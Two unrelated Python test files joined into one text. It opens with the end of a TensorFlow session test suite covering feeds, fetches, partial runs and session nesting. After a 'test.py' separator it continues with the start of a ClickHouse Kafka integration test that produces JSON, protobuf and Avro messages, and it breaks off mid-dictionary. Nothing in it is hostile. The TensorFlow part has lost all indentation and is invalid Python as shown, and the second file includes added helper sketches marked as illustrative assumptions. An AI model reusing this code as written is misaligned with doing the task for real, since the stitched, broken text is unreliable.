# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'The Session graph is empty.' in str(e)):
sess.run([])
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/gpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/gpu:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [dtypes.float16,
dtypes.float32,
dtypes.float64,
dtypes.int32,
dtypes.uint8,
dtypes.int16,
dtypes.int8,
dtypes.int64,
dtypes.bool,
dtypes.complex64,
dtypes.complex128]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
elif dtype == dtypes.complex128:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={feed_t: np_array}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={feed_t: np_array}))
# Also check that we can get both back.
out_v, feed_v = sess.run([out_t, feed_t],
feed_dict={feed_t: np_array})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(sess.run(feed_t, feed_dict={feed_t: c_list}),
c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01',
u'\u26a3 unicode', u'\U0001f60e deal with it']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 17
res = sess.partial_run(h, r2, feed_dict={c: temp})
self.assertEqual(153, res)
# Call again on the same graph.
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 18
res = sess.partial_run(h2, r2, feed_dict={c: temp})
self.assertEqual(162, res)
def testPartialRunIncomplete(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
def testConcurrentPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h1 = sess.partial_run_setup([r1], [a, b, c])
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 19
res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9})
self.assertEqual(66, res)
res = sess.partial_run(h2, r2, feed_dict={c: 7})
self.assertEqual(462, res)
def testManyPartialRun(self):
with session.Session() as sess:
steps = 200
inputs = []
outputs = []
a = constant_op.constant(2.0, dtypes.float32)
for i in xrange(steps):
inputs.append(array_ops.placeholder(dtypes.float32, shape=[]))
a = math_ops.mul(a, inputs[i])
outputs.append(a)
h = sess.partial_run_setup(outputs, inputs)
for i in xrange(steps):
res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0})
self.assertEqual(2.0, res)
feed_dict = {}
for i in xrange(steps):
feed_dict[inputs[i]] = 1.0
res = sess.run(outputs, feed_dict)
self.assertEqual(steps, len(res))
self.assertEqual(2.0, res[-1])
def testRunAndPartialRun(self):
with session.Session() as sess:
a = constant_op.constant(2.0, dtypes.float32)
b = a * 2
c = b * 3
r1 = sess.run([b, c])
h = sess.partial_run_setup([b, c], [])
r2 = sess.partial_run(h, [b, c])
self.assertEqual(r1, r2)
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(constant_op.constant(1.0), options=None,
run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(ValueError, 'may not be fed'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config) as sess:
with ops.device('/gpu:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.mul(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(d, feed_dict={a: 1.0},
options=run_options, run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
def testInvalidArgument(self):
with self.assertRaisesRegexp(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(
capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
if __name__ == '__main__':
googletest.main()
|
test.py
|
import json
import os.path as p
import random
import socket
import subprocess
import threading
import time
import logging
import io
import string
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
from confluent_kafka import admin
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
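# Sketch of the message definitions the generated modules above are assumed to
# provide (illustrative only; field numbers and scalar types are assumptions,
# the authoritative definitions live in kafka.proto and social.proto):
#
#   message KeyValuePair { uint64 key = 1; string value = 2; }      # kafka_pb2
#   message User { string username = 1; uint32 timestamp = 2; }     # social_pb2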
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml'],
with_kafka=True,
with_zookeeper=True, # For Replicated Table
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
errors = []
for _ in range(retries):
try:
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(port), value_serializer=serializer)
logging.debug("Kafka Connection establised: localhost:{}".format(port))
return producer
except Exception as e:
errors += [str(e)]
time.sleep(1)
raise Exception("Connection not establised, {}".format(errors))
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
producer = get_kafka_producer(kafka_cluster.kafka_port, producer_serializer, retries)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce(cluster, 'test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(kafka_cluster, topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), auto_offset_reset="earliest")
consumer.subscribe(topics=(topic,))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster,topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWrite seems to be mandatory to get schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
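# Illustrative usage sketch (the topic name here is an arbitrary assumption):
# avro_message() accepts either a single row dict or a list of rows matching the
# schema above, and the resulting container bytes can be produced unchanged.
def produce_avro_samples(kafka_cluster, topic='avro_example_topic'):
    kafka_produce(kafka_cluster, topic, [
        avro_message({'id': 0, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1}),
        avro_message([{'id': i, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1}
                      for i in range(1, 16)]),
    ])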
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> bytes
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
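# Sketch of the retry pattern described above (the default table name and the
# 30-second deadline are illustrative assumptions): keep accumulating query
# results until they match the reference file, then assert on the final result.
def poll_kafka_result(table='test.kafka', ref_file='test_kafka_json.reference', timeout=30):
    deadline = time.monotonic() + timeout
    result = ''
    while time.monotonic() < deadline:
        result += instance.query('SELECT * FROM {}'.format(table), ignore_error=True)
        if kafka_check_result(result, ref_file=ref_file):
            break
        time.sleep(0.5)
    kafka_check_result(result, True, ref_file=ref_file)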
def describe_consumer_group(kafka_cluster, name):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
consumer_groups = admin_client.describe_consumer_groups([name])
res = []
for member in consumer_groups[0].members:
member_info = {}
member_info['member_id'] = member.member_id
member_info['client_id'] = member.client_id
member_info['client_host'] = member.client_host
member_topics_assignment = []
for (topic, partitions) in member.member_assignment.assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
wait_kafka_is_available() # ensure kafka is alive
kafka_producer_send_heartbeat_msg() # ensure python kafka client is ok
# print("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_json_as_string(kafka_cluster):
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
@pytest.mark.timeout(120)
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
